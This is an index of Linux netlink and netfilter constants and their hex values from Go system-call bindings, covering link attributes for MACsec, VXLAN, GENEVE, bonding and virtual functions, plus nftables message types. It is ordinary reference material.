IFLA_MACSEC_INC_SCI (line 1711) | IFLA_MACSEC_INC_SCI = 0x9 constant IFLA_MACSEC_ES (line 1712) | IFLA_MACSEC_ES = 0xa constant IFLA_MACSEC_SCB (line 1713) | IFLA_MACSEC_SCB = 0xb constant IFLA_MACSEC_REPLAY_PROTECT (line 1714) | IFLA_MACSEC_REPLAY_PROTECT = 0xc constant IFLA_MACSEC_VALIDATION (line 1715) | IFLA_MACSEC_VALIDATION = 0xd constant IFLA_MACSEC_PAD (line 1716) | IFLA_MACSEC_PAD = 0xe constant IFLA_MACSEC_OFFLOAD (line 1717) | IFLA_MACSEC_OFFLOAD = 0xf constant IFLA_XFRM_UNSPEC (line 1718) | IFLA_XFRM_UNSPEC = 0x0 constant IFLA_XFRM_LINK (line 1719) | IFLA_XFRM_LINK = 0x1 constant IFLA_XFRM_IF_ID (line 1720) | IFLA_XFRM_IF_ID = 0x2 constant IFLA_XFRM_COLLECT_METADATA (line 1721) | IFLA_XFRM_COLLECT_METADATA = 0x3 constant IFLA_IPVLAN_UNSPEC (line 1722) | IFLA_IPVLAN_UNSPEC = 0x0 constant IFLA_IPVLAN_MODE (line 1723) | IFLA_IPVLAN_MODE = 0x1 constant IFLA_IPVLAN_FLAGS (line 1724) | IFLA_IPVLAN_FLAGS = 0x2 constant NETKIT_NEXT (line 1725) | NETKIT_NEXT = -0x1 constant NETKIT_PASS (line 1726) | NETKIT_PASS = 0x0 constant NETKIT_DROP (line 1727) | NETKIT_DROP = 0x2 constant NETKIT_REDIRECT (line 1728) | NETKIT_REDIRECT = 0x7 constant NETKIT_L2 (line 1729) | NETKIT_L2 = 0x0 constant NETKIT_L3 (line 1730) | NETKIT_L3 = 0x1 constant IFLA_NETKIT_UNSPEC (line 1731) | IFLA_NETKIT_UNSPEC = 0x0 constant IFLA_NETKIT_PEER_INFO (line 1732) | IFLA_NETKIT_PEER_INFO = 0x1 constant IFLA_NETKIT_PRIMARY (line 1733) | IFLA_NETKIT_PRIMARY = 0x2 constant IFLA_NETKIT_POLICY (line 1734) | IFLA_NETKIT_POLICY = 0x3 constant IFLA_NETKIT_PEER_POLICY (line 1735) | IFLA_NETKIT_PEER_POLICY = 0x4 constant IFLA_NETKIT_MODE (line 1736) | IFLA_NETKIT_MODE = 0x5 constant IFLA_VXLAN_UNSPEC (line 1737) | IFLA_VXLAN_UNSPEC = 0x0 constant IFLA_VXLAN_ID (line 1738) | IFLA_VXLAN_ID = 0x1 constant IFLA_VXLAN_GROUP (line 1739) | IFLA_VXLAN_GROUP = 0x2 constant IFLA_VXLAN_LINK (line 1740) | IFLA_VXLAN_LINK = 0x3 constant IFLA_VXLAN_LOCAL (line 1741) | IFLA_VXLAN_LOCAL = 0x4 constant IFLA_VXLAN_TTL (line 1742) | IFLA_VXLAN_TTL = 0x5 constant IFLA_VXLAN_TOS (line 1743) | IFLA_VXLAN_TOS = 0x6 constant IFLA_VXLAN_LEARNING (line 1744) | IFLA_VXLAN_LEARNING = 0x7 constant IFLA_VXLAN_AGEING (line 1745) | IFLA_VXLAN_AGEING = 0x8 constant IFLA_VXLAN_LIMIT (line 1746) | IFLA_VXLAN_LIMIT = 0x9 constant IFLA_VXLAN_PORT_RANGE (line 1747) | IFLA_VXLAN_PORT_RANGE = 0xa constant IFLA_VXLAN_PROXY (line 1748) | IFLA_VXLAN_PROXY = 0xb constant IFLA_VXLAN_RSC (line 1749) | IFLA_VXLAN_RSC = 0xc constant IFLA_VXLAN_L2MISS (line 1750) | IFLA_VXLAN_L2MISS = 0xd constant IFLA_VXLAN_L3MISS (line 1751) | IFLA_VXLAN_L3MISS = 0xe constant IFLA_VXLAN_PORT (line 1752) | IFLA_VXLAN_PORT = 0xf constant IFLA_VXLAN_GROUP6 (line 1753) | IFLA_VXLAN_GROUP6 = 0x10 constant IFLA_VXLAN_LOCAL6 (line 1754) | IFLA_VXLAN_LOCAL6 = 0x11 constant IFLA_VXLAN_UDP_CSUM (line 1755) | IFLA_VXLAN_UDP_CSUM = 0x12 constant IFLA_VXLAN_UDP_ZERO_CSUM6_TX (line 1756) | IFLA_VXLAN_UDP_ZERO_CSUM6_TX = 0x13 constant IFLA_VXLAN_UDP_ZERO_CSUM6_RX (line 1757) | IFLA_VXLAN_UDP_ZERO_CSUM6_RX = 0x14 constant IFLA_VXLAN_REMCSUM_TX (line 1758) | IFLA_VXLAN_REMCSUM_TX = 0x15 constant IFLA_VXLAN_REMCSUM_RX (line 1759) | IFLA_VXLAN_REMCSUM_RX = 0x16 constant IFLA_VXLAN_GBP (line 1760) | IFLA_VXLAN_GBP = 0x17 constant IFLA_VXLAN_REMCSUM_NOPARTIAL (line 1761) | IFLA_VXLAN_REMCSUM_NOPARTIAL = 0x18 constant IFLA_VXLAN_COLLECT_METADATA (line 1762) | IFLA_VXLAN_COLLECT_METADATA = 0x19 constant IFLA_VXLAN_LABEL (line 1763) | IFLA_VXLAN_LABEL = 0x1a constant IFLA_VXLAN_GPE (line 1764) | IFLA_VXLAN_GPE = 0x1b constant IFLA_VXLAN_TTL_INHERIT (line 1765) | IFLA_VXLAN_TTL_INHERIT = 0x1c constant IFLA_VXLAN_DF (line 1766) | IFLA_VXLAN_DF = 0x1d constant IFLA_VXLAN_VNIFILTER (line 1767) | IFLA_VXLAN_VNIFILTER = 0x1e constant IFLA_VXLAN_LOCALBYPASS (line 1768) | IFLA_VXLAN_LOCALBYPASS = 0x1f constant IFLA_GENEVE_UNSPEC (line 1769) | IFLA_GENEVE_UNSPEC = 0x0 constant IFLA_GENEVE_ID (line 1770) | IFLA_GENEVE_ID = 0x1 constant IFLA_GENEVE_REMOTE (line 1771) | IFLA_GENEVE_REMOTE = 0x2 constant IFLA_GENEVE_TTL (line 1772) | IFLA_GENEVE_TTL = 0x3 constant IFLA_GENEVE_TOS (line 1773) | IFLA_GENEVE_TOS = 0x4 constant IFLA_GENEVE_PORT (line 1774) | IFLA_GENEVE_PORT = 0x5 constant IFLA_GENEVE_COLLECT_METADATA (line 1775) | IFLA_GENEVE_COLLECT_METADATA = 0x6 constant IFLA_GENEVE_REMOTE6 (line 1776) | IFLA_GENEVE_REMOTE6 = 0x7 constant IFLA_GENEVE_UDP_CSUM (line 1777) | IFLA_GENEVE_UDP_CSUM = 0x8 constant IFLA_GENEVE_UDP_ZERO_CSUM6_TX (line 1778) | IFLA_GENEVE_UDP_ZERO_CSUM6_TX = 0x9 constant IFLA_GENEVE_UDP_ZERO_CSUM6_RX (line 1779) | IFLA_GENEVE_UDP_ZERO_CSUM6_RX = 0xa constant IFLA_GENEVE_LABEL (line 1780) | IFLA_GENEVE_LABEL = 0xb constant IFLA_GENEVE_TTL_INHERIT (line 1781) | IFLA_GENEVE_TTL_INHERIT = 0xc constant IFLA_GENEVE_DF (line 1782) | IFLA_GENEVE_DF = 0xd constant IFLA_GENEVE_INNER_PROTO_INHERIT (line 1783) | IFLA_GENEVE_INNER_PROTO_INHERIT = 0xe constant IFLA_BAREUDP_UNSPEC (line 1784) | IFLA_BAREUDP_UNSPEC = 0x0 constant IFLA_BAREUDP_PORT (line 1785) | IFLA_BAREUDP_PORT = 0x1 constant IFLA_BAREUDP_ETHERTYPE (line 1786) | IFLA_BAREUDP_ETHERTYPE = 0x2 constant IFLA_BAREUDP_SRCPORT_MIN (line 1787) | IFLA_BAREUDP_SRCPORT_MIN = 0x3 constant IFLA_BAREUDP_MULTIPROTO_MODE (line 1788) | IFLA_BAREUDP_MULTIPROTO_MODE = 0x4 constant IFLA_PPP_UNSPEC (line 1789) | IFLA_PPP_UNSPEC = 0x0 constant IFLA_PPP_DEV_FD (line 1790) | IFLA_PPP_DEV_FD = 0x1 constant IFLA_GTP_UNSPEC (line 1791) | IFLA_GTP_UNSPEC = 0x0 constant IFLA_GTP_FD0 (line 1792) | IFLA_GTP_FD0 = 0x1 constant IFLA_GTP_FD1 (line 1793) | IFLA_GTP_FD1 = 0x2 constant IFLA_GTP_PDP_HASHSIZE (line 1794) | IFLA_GTP_PDP_HASHSIZE = 0x3 constant IFLA_GTP_ROLE (line 1795) | IFLA_GTP_ROLE = 0x4 constant IFLA_GTP_CREATE_SOCKETS (line 1796) | IFLA_GTP_CREATE_SOCKETS = 0x5 constant IFLA_GTP_RESTART_COUNT (line 1797) | IFLA_GTP_RESTART_COUNT = 0x6 constant IFLA_BOND_UNSPEC (line 1798) | IFLA_BOND_UNSPEC = 0x0 constant IFLA_BOND_MODE (line 1799) | IFLA_BOND_MODE = 0x1 constant IFLA_BOND_ACTIVE_SLAVE (line 1800) | IFLA_BOND_ACTIVE_SLAVE = 0x2 constant IFLA_BOND_MIIMON (line 1801) | IFLA_BOND_MIIMON = 0x3 constant IFLA_BOND_UPDELAY (line 1802) | IFLA_BOND_UPDELAY = 0x4 constant IFLA_BOND_DOWNDELAY (line 1803) | IFLA_BOND_DOWNDELAY = 0x5 constant IFLA_BOND_USE_CARRIER (line 1804) | IFLA_BOND_USE_CARRIER = 0x6 constant IFLA_BOND_ARP_INTERVAL (line 1805) | IFLA_BOND_ARP_INTERVAL = 0x7 constant IFLA_BOND_ARP_IP_TARGET (line 1806) | IFLA_BOND_ARP_IP_TARGET = 0x8 constant IFLA_BOND_ARP_VALIDATE (line 1807) | IFLA_BOND_ARP_VALIDATE = 0x9 constant IFLA_BOND_ARP_ALL_TARGETS (line 1808) | IFLA_BOND_ARP_ALL_TARGETS = 0xa constant IFLA_BOND_PRIMARY (line 1809) | IFLA_BOND_PRIMARY = 0xb constant IFLA_BOND_PRIMARY_RESELECT (line 1810) | IFLA_BOND_PRIMARY_RESELECT = 0xc constant IFLA_BOND_FAIL_OVER_MAC (line 1811) | IFLA_BOND_FAIL_OVER_MAC = 0xd constant IFLA_BOND_XMIT_HASH_POLICY (line 1812) | IFLA_BOND_XMIT_HASH_POLICY = 0xe constant IFLA_BOND_RESEND_IGMP (line 1813) | IFLA_BOND_RESEND_IGMP = 0xf constant IFLA_BOND_NUM_PEER_NOTIF (line 1814) | IFLA_BOND_NUM_PEER_NOTIF = 0x10 constant IFLA_BOND_ALL_SLAVES_ACTIVE (line 1815) | IFLA_BOND_ALL_SLAVES_ACTIVE = 0x11 constant IFLA_BOND_MIN_LINKS (line 1816) | IFLA_BOND_MIN_LINKS = 0x12 constant IFLA_BOND_LP_INTERVAL (line 1817) | IFLA_BOND_LP_INTERVAL = 0x13 constant IFLA_BOND_PACKETS_PER_SLAVE (line 1818) | IFLA_BOND_PACKETS_PER_SLAVE = 0x14 constant IFLA_BOND_AD_LACP_RATE (line 1819) | IFLA_BOND_AD_LACP_RATE = 0x15 constant IFLA_BOND_AD_SELECT (line 1820) | IFLA_BOND_AD_SELECT = 0x16 constant IFLA_BOND_AD_INFO (line 1821) | IFLA_BOND_AD_INFO = 0x17 constant IFLA_BOND_AD_ACTOR_SYS_PRIO (line 1822) | IFLA_BOND_AD_ACTOR_SYS_PRIO = 0x18 constant IFLA_BOND_AD_USER_PORT_KEY (line 1823) | IFLA_BOND_AD_USER_PORT_KEY = 0x19 constant IFLA_BOND_AD_ACTOR_SYSTEM (line 1824) | IFLA_BOND_AD_ACTOR_SYSTEM = 0x1a constant IFLA_BOND_TLB_DYNAMIC_LB (line 1825) | IFLA_BOND_TLB_DYNAMIC_LB = 0x1b constant IFLA_BOND_PEER_NOTIF_DELAY (line 1826) | IFLA_BOND_PEER_NOTIF_DELAY = 0x1c constant IFLA_BOND_AD_LACP_ACTIVE (line 1827) | IFLA_BOND_AD_LACP_ACTIVE = 0x1d constant IFLA_BOND_MISSED_MAX (line 1828) | IFLA_BOND_MISSED_MAX = 0x1e constant IFLA_BOND_NS_IP6_TARGET (line 1829) | IFLA_BOND_NS_IP6_TARGET = 0x1f constant IFLA_BOND_AD_INFO_UNSPEC (line 1830) | IFLA_BOND_AD_INFO_UNSPEC = 0x0 constant IFLA_BOND_AD_INFO_AGGREGATOR (line 1831) | IFLA_BOND_AD_INFO_AGGREGATOR = 0x1 constant IFLA_BOND_AD_INFO_NUM_PORTS (line 1832) | IFLA_BOND_AD_INFO_NUM_PORTS = 0x2 constant IFLA_BOND_AD_INFO_ACTOR_KEY (line 1833) | IFLA_BOND_AD_INFO_ACTOR_KEY = 0x3 constant IFLA_BOND_AD_INFO_PARTNER_KEY (line 1834) | IFLA_BOND_AD_INFO_PARTNER_KEY = 0x4 constant IFLA_BOND_AD_INFO_PARTNER_MAC (line 1835) | IFLA_BOND_AD_INFO_PARTNER_MAC = 0x5 constant IFLA_BOND_SLAVE_UNSPEC (line 1836) | IFLA_BOND_SLAVE_UNSPEC = 0x0 constant IFLA_BOND_SLAVE_STATE (line 1837) | IFLA_BOND_SLAVE_STATE = 0x1 constant IFLA_BOND_SLAVE_MII_STATUS (line 1838) | IFLA_BOND_SLAVE_MII_STATUS = 0x2 constant IFLA_BOND_SLAVE_LINK_FAILURE_COUNT (line 1839) | IFLA_BOND_SLAVE_LINK_FAILURE_COUNT = 0x3 constant IFLA_BOND_SLAVE_PERM_HWADDR (line 1840) | IFLA_BOND_SLAVE_PERM_HWADDR = 0x4 constant IFLA_BOND_SLAVE_QUEUE_ID (line 1841) | IFLA_BOND_SLAVE_QUEUE_ID = 0x5 constant IFLA_BOND_SLAVE_AD_AGGREGATOR_ID (line 1842) | IFLA_BOND_SLAVE_AD_AGGREGATOR_ID = 0x6 constant IFLA_BOND_SLAVE_AD_ACTOR_OPER_PORT_STATE (line 1843) | IFLA_BOND_SLAVE_AD_ACTOR_OPER_PORT_STATE = 0x7 constant IFLA_BOND_SLAVE_AD_PARTNER_OPER_PORT_STATE (line 1844) | IFLA_BOND_SLAVE_AD_PARTNER_OPER_PORT_STATE = 0x8 constant IFLA_BOND_SLAVE_PRIO (line 1845) | IFLA_BOND_SLAVE_PRIO = 0x9 constant IFLA_VF_INFO_UNSPEC (line 1846) | IFLA_VF_INFO_UNSPEC = 0x0 constant IFLA_VF_INFO (line 1847) | IFLA_VF_INFO = 0x1 constant IFLA_VF_UNSPEC (line 1848) | IFLA_VF_UNSPEC = 0x0 constant IFLA_VF_MAC (line 1849) | IFLA_VF_MAC = 0x1 constant IFLA_VF_VLAN (line 1850) | IFLA_VF_VLAN = 0x2 constant IFLA_VF_TX_RATE (line 1851) | IFLA_VF_TX_RATE = 0x3 constant IFLA_VF_SPOOFCHK (line 1852) | IFLA_VF_SPOOFCHK = 0x4 constant IFLA_VF_LINK_STATE (line 1853) | IFLA_VF_LINK_STATE = 0x5 constant IFLA_VF_RATE (line 1854) | IFLA_VF_RATE = 0x6 constant IFLA_VF_RSS_QUERY_EN (line 1855) | IFLA_VF_RSS_QUERY_EN = 0x7 constant IFLA_VF_STATS (line 1856) | IFLA_VF_STATS = 0x8 constant IFLA_VF_TRUST (line 1857) | IFLA_VF_TRUST = 0x9 constant IFLA_VF_IB_NODE_GUID (line 1858) | IFLA_VF_IB_NODE_GUID = 0xa constant IFLA_VF_IB_PORT_GUID (line 1859) | IFLA_VF_IB_PORT_GUID = 0xb constant IFLA_VF_VLAN_LIST (line 1860) | IFLA_VF_VLAN_LIST = 0xc constant IFLA_VF_BROADCAST (line 1861) | IFLA_VF_BROADCAST = 0xd constant IFLA_VF_VLAN_INFO_UNSPEC (line 1862) | IFLA_VF_VLAN_INFO_UNSPEC = 0x0 constant IFLA_VF_VLAN_INFO (line 1863) | IFLA_VF_VLAN_INFO = 0x1 constant IFLA_VF_LINK_STATE_AUTO (line 1864) | IFLA_VF_LINK_STATE_AUTO = 0x0 constant IFLA_VF_LINK_STATE_ENABLE (line 1865) | IFLA_VF_LINK_STATE_ENABLE = 0x1 constant IFLA_VF_LINK_STATE_DISABLE (line 1866) | IFLA_VF_LINK_STATE_DISABLE = 0x2 constant IFLA_VF_STATS_RX_PACKETS (line 1867) | IFLA_VF_STATS_RX_PACKETS = 0x0 constant IFLA_VF_STATS_TX_PACKETS (line 1868) | IFLA_VF_STATS_TX_PACKETS = 0x1 constant IFLA_VF_STATS_RX_BYTES (line 1869) | IFLA_VF_STATS_RX_BYTES = 0x2 constant IFLA_VF_STATS_TX_BYTES (line 1870) | IFLA_VF_STATS_TX_BYTES = 0x3 constant IFLA_VF_STATS_BROADCAST (line 1871) | IFLA_VF_STATS_BROADCAST = 0x4 constant IFLA_VF_STATS_MULTICAST (line 1872) | IFLA_VF_STATS_MULTICAST = 0x5 constant IFLA_VF_STATS_PAD (line 1873) | IFLA_VF_STATS_PAD = 0x6 constant IFLA_VF_STATS_RX_DROPPED (line 1874) | IFLA_VF_STATS_RX_DROPPED = 0x7 constant IFLA_VF_STATS_TX_DROPPED (line 1875) | IFLA_VF_STATS_TX_DROPPED = 0x8 constant IFLA_VF_PORT_UNSPEC (line 1876) | IFLA_VF_PORT_UNSPEC = 0x0 constant IFLA_VF_PORT (line 1877) | IFLA_VF_PORT = 0x1 constant IFLA_PORT_UNSPEC (line 1878) | IFLA_PORT_UNSPEC = 0x0 constant IFLA_PORT_VF (line 1879) | IFLA_PORT_VF = 0x1 constant IFLA_PORT_PROFILE (line 1880) | IFLA_PORT_PROFILE = 0x2 constant IFLA_PORT_VSI_TYPE (line 1881) | IFLA_PORT_VSI_TYPE = 0x3 constant IFLA_PORT_INSTANCE_UUID (line 1882) | IFLA_PORT_INSTANCE_UUID = 0x4 constant IFLA_PORT_HOST_UUID (line 1883) | IFLA_PORT_HOST_UUID = 0x5 constant IFLA_PORT_REQUEST (line 1884) | IFLA_PORT_REQUEST = 0x6 constant IFLA_PORT_RESPONSE (line 1885) | IFLA_PORT_RESPONSE = 0x7 constant IFLA_IPOIB_UNSPEC (line 1886) | IFLA_IPOIB_UNSPEC = 0x0 constant IFLA_IPOIB_PKEY (line 1887) | IFLA_IPOIB_PKEY = 0x1 constant IFLA_IPOIB_MODE (line 1888) | IFLA_IPOIB_MODE = 0x2 constant IFLA_IPOIB_UMCAST (line 1889) | IFLA_IPOIB_UMCAST = 0x3 constant IFLA_HSR_UNSPEC (line 1890) | IFLA_HSR_UNSPEC = 0x0 constant IFLA_HSR_SLAVE1 (line 1891) | IFLA_HSR_SLAVE1 = 0x1 constant IFLA_HSR_SLAVE2 (line 1892) | IFLA_HSR_SLAVE2 = 0x2 constant IFLA_HSR_MULTICAST_SPEC (line 1893) | IFLA_HSR_MULTICAST_SPEC = 0x3 constant IFLA_HSR_SUPERVISION_ADDR (line 1894) | IFLA_HSR_SUPERVISION_ADDR = 0x4 constant IFLA_HSR_SEQ_NR (line 1895) | IFLA_HSR_SEQ_NR = 0x5 constant IFLA_HSR_VERSION (line 1896) | IFLA_HSR_VERSION = 0x6 constant IFLA_HSR_PROTOCOL (line 1897) | IFLA_HSR_PROTOCOL = 0x7 constant IFLA_STATS_UNSPEC (line 1898) | IFLA_STATS_UNSPEC = 0x0 constant IFLA_STATS_LINK_64 (line 1899) | IFLA_STATS_LINK_64 = 0x1 constant IFLA_STATS_LINK_XSTATS (line 1900) | IFLA_STATS_LINK_XSTATS = 0x2 constant IFLA_STATS_LINK_XSTATS_SLAVE (line 1901) | IFLA_STATS_LINK_XSTATS_SLAVE = 0x3 constant IFLA_STATS_LINK_OFFLOAD_XSTATS (line 1902) | IFLA_STATS_LINK_OFFLOAD_XSTATS = 0x4 constant IFLA_STATS_AF_SPEC (line 1903) | IFLA_STATS_AF_SPEC = 0x5 constant IFLA_STATS_GETSET_UNSPEC (line 1904) | IFLA_STATS_GETSET_UNSPEC = 0x0 constant IFLA_STATS_GET_FILTERS (line 1905) | IFLA_STATS_GET_FILTERS = 0x1 constant IFLA_STATS_SET_OFFLOAD_XSTATS_L3_STATS (line 1906) | IFLA_STATS_SET_OFFLOAD_XSTATS_L3_STATS = 0x2 constant IFLA_OFFLOAD_XSTATS_UNSPEC (line 1907) | IFLA_OFFLOAD_XSTATS_UNSPEC = 0x0 constant IFLA_OFFLOAD_XSTATS_CPU_HIT (line 1908) | IFLA_OFFLOAD_XSTATS_CPU_HIT = 0x1 constant IFLA_OFFLOAD_XSTATS_HW_S_INFO (line 1909) | IFLA_OFFLOAD_XSTATS_HW_S_INFO = 0x2 constant IFLA_OFFLOAD_XSTATS_L3_STATS (line 1910) | IFLA_OFFLOAD_XSTATS_L3_STATS = 0x3 constant IFLA_OFFLOAD_XSTATS_HW_S_INFO_UNSPEC (line 1911) | IFLA_OFFLOAD_XSTATS_HW_S_INFO_UNSPEC = 0x0 constant IFLA_OFFLOAD_XSTATS_HW_S_INFO_REQUEST (line 1912) | IFLA_OFFLOAD_XSTATS_HW_S_INFO_REQUEST = 0x1 constant IFLA_OFFLOAD_XSTATS_HW_S_INFO_USED (line 1913) | IFLA_OFFLOAD_XSTATS_HW_S_INFO_USED = 0x2 constant IFLA_XDP_UNSPEC (line 1914) | IFLA_XDP_UNSPEC = 0x0 constant IFLA_XDP_FD (line 1915) | IFLA_XDP_FD = 0x1 constant IFLA_XDP_ATTACHED (line 1916) | IFLA_XDP_ATTACHED = 0x2 constant IFLA_XDP_FLAGS (line 1917) | IFLA_XDP_FLAGS = 0x3 constant IFLA_XDP_PROG_ID (line 1918) | IFLA_XDP_PROG_ID = 0x4 constant IFLA_XDP_DRV_PROG_ID (line 1919) | IFLA_XDP_DRV_PROG_ID = 0x5 constant IFLA_XDP_SKB_PROG_ID (line 1920) | IFLA_XDP_SKB_PROG_ID = 0x6 constant IFLA_XDP_HW_PROG_ID (line 1921) | IFLA_XDP_HW_PROG_ID = 0x7 constant IFLA_XDP_EXPECTED_FD (line 1922) | IFLA_XDP_EXPECTED_FD = 0x8 constant IFLA_EVENT_NONE (line 1923) | IFLA_EVENT_NONE = 0x0 constant IFLA_EVENT_REBOOT (line 1924) | IFLA_EVENT_REBOOT = 0x1 constant IFLA_EVENT_FEATURES (line 1925) | IFLA_EVENT_FEATURES = 0x2 constant IFLA_EVENT_BONDING_FAILOVER (line 1926) | IFLA_EVENT_BONDING_FAILOVER = 0x3 constant IFLA_EVENT_NOTIFY_PEERS (line 1927) | IFLA_EVENT_NOTIFY_PEERS = 0x4 constant IFLA_EVENT_IGMP_RESEND (line 1928) | IFLA_EVENT_IGMP_RESEND = 0x5 constant IFLA_EVENT_BONDING_OPTIONS (line 1929) | IFLA_EVENT_BONDING_OPTIONS = 0x6 constant IFLA_TUN_UNSPEC (line 1930) | IFLA_TUN_UNSPEC = 0x0 constant IFLA_TUN_OWNER (line 1931) | IFLA_TUN_OWNER = 0x1 constant IFLA_TUN_GROUP (line 1932) | IFLA_TUN_GROUP = 0x2 constant IFLA_TUN_TYPE (line 1933) | IFLA_TUN_TYPE = 0x3 constant IFLA_TUN_PI (line 1934) | IFLA_TUN_PI = 0x4 constant IFLA_TUN_VNET_HDR (line 1935) | IFLA_TUN_VNET_HDR = 0x5 constant IFLA_TUN_PERSIST (line 1936) | IFLA_TUN_PERSIST = 0x6 constant IFLA_TUN_MULTI_QUEUE (line 1937) | IFLA_TUN_MULTI_QUEUE = 0x7 constant IFLA_TUN_NUM_QUEUES (line 1938) | IFLA_TUN_NUM_QUEUES = 0x8 constant IFLA_TUN_NUM_DISABLED_QUEUES (line 1939) | IFLA_TUN_NUM_DISABLED_QUEUES = 0x9 constant IFLA_RMNET_UNSPEC (line 1940) | IFLA_RMNET_UNSPEC = 0x0 constant IFLA_RMNET_MUX_ID (line 1941) | IFLA_RMNET_MUX_ID = 0x1 constant IFLA_RMNET_FLAGS (line 1942) | IFLA_RMNET_FLAGS = 0x2 constant IFLA_MCTP_UNSPEC (line 1943) | IFLA_MCTP_UNSPEC = 0x0 constant IFLA_MCTP_NET (line 1944) | IFLA_MCTP_NET = 0x1 constant IFLA_DSA_UNSPEC (line 1945) | IFLA_DSA_UNSPEC = 0x0 constant IFLA_DSA_CONDUIT (line 1946) | IFLA_DSA_CONDUIT = 0x1 constant IFLA_DSA_MASTER (line 1947) | IFLA_DSA_MASTER = 0x1 constant NF_INET_PRE_ROUTING (line 1951) | NF_INET_PRE_ROUTING = 0x0 constant NF_INET_LOCAL_IN (line 1952) | NF_INET_LOCAL_IN = 0x1 constant NF_INET_FORWARD (line 1953) | NF_INET_FORWARD = 0x2 constant NF_INET_LOCAL_OUT (line 1954) | NF_INET_LOCAL_OUT = 0x3 constant NF_INET_POST_ROUTING (line 1955) | NF_INET_POST_ROUTING = 0x4 constant NF_INET_NUMHOOKS (line 1956) | NF_INET_NUMHOOKS = 0x5 constant NF_NETDEV_INGRESS (line 1960) | NF_NETDEV_INGRESS = 0x0 constant NF_NETDEV_EGRESS (line 1961) | NF_NETDEV_EGRESS = 0x1 constant NF_NETDEV_NUMHOOKS (line 1962) | NF_NETDEV_NUMHOOKS = 0x2 constant NFPROTO_UNSPEC (line 1966) | NFPROTO_UNSPEC = 0x0 constant NFPROTO_INET (line 1967) | NFPROTO_INET = 0x1 constant NFPROTO_IPV4 (line 1968) | NFPROTO_IPV4 = 0x2 constant NFPROTO_ARP (line 1969) | NFPROTO_ARP = 0x3 constant NFPROTO_NETDEV (line 1970) | NFPROTO_NETDEV = 0x5 constant NFPROTO_BRIDGE (line 1971) | NFPROTO_BRIDGE = 0x7 constant NFPROTO_IPV6 (line 1972) | NFPROTO_IPV6 = 0xa constant NFPROTO_DECNET (line 1973) | NFPROTO_DECNET = 0xc constant NFPROTO_NUMPROTO (line 1974) | NFPROTO_NUMPROTO = 0xd constant SO_ORIGINAL_DST (line 1977) | SO_ORIGINAL_DST = 0x50 type Nfgenmsg (line 1979) | type Nfgenmsg struct constant NFNL_BATCH_UNSPEC (line 1986) | NFNL_BATCH_UNSPEC = 0x0 constant NFNL_BATCH_GENID (line 1987) | NFNL_BATCH_GENID = 0x1 constant NFT_REG_VERDICT (line 1991) | NFT_REG_VERDICT = 0x0 constant NFT_REG_1 (line 1992) | NFT_REG_1 = 0x1 constant NFT_REG_2 (line 1993) | NFT_REG_2 = 0x2 constant NFT_REG_3 (line 1994) | NFT_REG_3 = 0x3 constant NFT_REG_4 (line 1995) | NFT_REG_4 = 0x4 constant NFT_REG32_00 (line 1996) | NFT_REG32_00 = 0x8 constant NFT_REG32_01 (line 1997) | NFT_REG32_01 = 0x9 constant NFT_REG32_02 (line 1998) | NFT_REG32_02 = 0xa constant NFT_REG32_03 (line 1999) | NFT_REG32_03 = 0xb constant NFT_REG32_04 (line 2000) | NFT_REG32_04 = 0xc constant NFT_REG32_05 (line 2001) | NFT_REG32_05 = 0xd constant NFT_REG32_06 (line 2002) | NFT_REG32_06 = 0xe constant NFT_REG32_07 (line 2003) | NFT_REG32_07 = 0xf constant NFT_REG32_08 (line 2004) | NFT_REG32_08 = 0x10 constant NFT_REG32_09 (line 2005) | NFT_REG32_09 = 0x11 constant NFT_REG32_10 (line 2006) | NFT_REG32_10 = 0x12 constant NFT_REG32_11 (line 2007) | NFT_REG32_11 = 0x13 constant NFT_REG32_12 (line 2008) | NFT_REG32_12 = 0x14 constant NFT_REG32_13 (line 2009) | NFT_REG32_13 = 0x15 constant NFT_REG32_14 (line 2010) | NFT_REG32_14 = 0x16 constant NFT_REG32_15 (line 2011) | NFT_REG32_15 = 0x17 constant NFT_CONTINUE (line 2012) | NFT_CONTINUE = -0x1 constant NFT_BREAK (line 2013) | NFT_BREAK = -0x2 constant NFT_JUMP (line 2014) | NFT_JUMP = -0x3 constant NFT_GOTO (line 2015) | NFT_GOTO = -0x4 constant NFT_RETURN (line 2016) | NFT_RETURN = -0x5 constant NFT_MSG_NEWTABLE (line 2017) | NFT_MSG_NEWTABLE = 0x0 constant NFT_MSG_GETTABLE (line 2018) | NFT_MSG_GETTABLE = 0x1 constant NFT_MSG_DELTABLE (line 2019) | NFT_MSG_DELTABLE = 0x2 constant NFT_MSG_NEWCHAIN (line 2020) | NFT_MSG_NEWCHAIN = 0x3 constant NFT_MSG_GETCHAIN (line 2021) | NFT_MSG_GETCHAIN = 0x4 constant NFT_MSG_DELCHAIN (line 2022) | NFT_MSG_DELCHAIN = 0x5 constant NFT_MSG_NEWRULE (line 2023) | NFT_MSG_NEWRULE = 0x6 constant NFT_MSG_GETRULE (line 2024) | NFT_MSG_GETRULE = 0x7 constant NFT_MSG_DELRULE (line 2025) | NFT_MSG_DELRULE = 0x8 constant NFT_MSG_NEWSET (line 2026) | NFT_MSG_NEWSET = 0x9 constant NFT_MSG_GETSET (line 2027) | NFT_MSG_GETSET = 0xa constant NFT_MSG_DELSET (line 2028) | NFT_MSG_DELSET = 0xb constant NFT_MSG_NEWSETELEM (line 2029) | NFT_MSG_NEWSETELEM = 0xc constant NFT_MSG_GETSETELEM (line 2030) | NFT_MSG_GETSETELEM = 0xd constant NFT_MSG_DELSETELEM (line 2031) | NFT_MSG_DELSETELEM = 0xe constant NFT_MSG_NEWGEN (line 2032) | NFT_MSG_NEWGEN = 0xf constant NFT_MSG_GETGEN (line 2033) | NFT_MSG_GETGEN = 0x10 constant NFT_MSG_TRACE (line 2034) | NFT_MSG_TRACE = 0x11 constant NFT_MSG_NEWOBJ (line 2035) | NFT_MSG_NEWOBJ = 0x12 constant NFT_MSG_GETOBJ (line 2036) | NFT_MSG_GETOBJ = 0x13 constant NFT_MSG_DELOBJ (line 2037) | NFT_MSG_DELOBJ = 0x14 constant NFT_MSG_GETOBJ_RESET (line 2038) | NFT_MSG_GETOBJ_RESET = 0x15 constant NFT_MSG_NEWFLOWTABLE (line 2039) | NFT_MSG_NEWFLOWTABLE = 0x16 constant NFT_MSG_GETFLOWTABLE (line 2040) | NFT_MSG_GETFLOWTABLE = 0x17 constant NFT_MSG_DELFLOWTABLE (line 2041) | NFT_MSG_DELFLOWTABLE = 0x18 constant NFT_MSG_GETRULE_RESET (line 2042) | NFT_MSG_GETRULE_RESET = 0x19 constant NFT_MSG_MAX (line 2043) | NFT_MSG_MAX = 0x22 constant 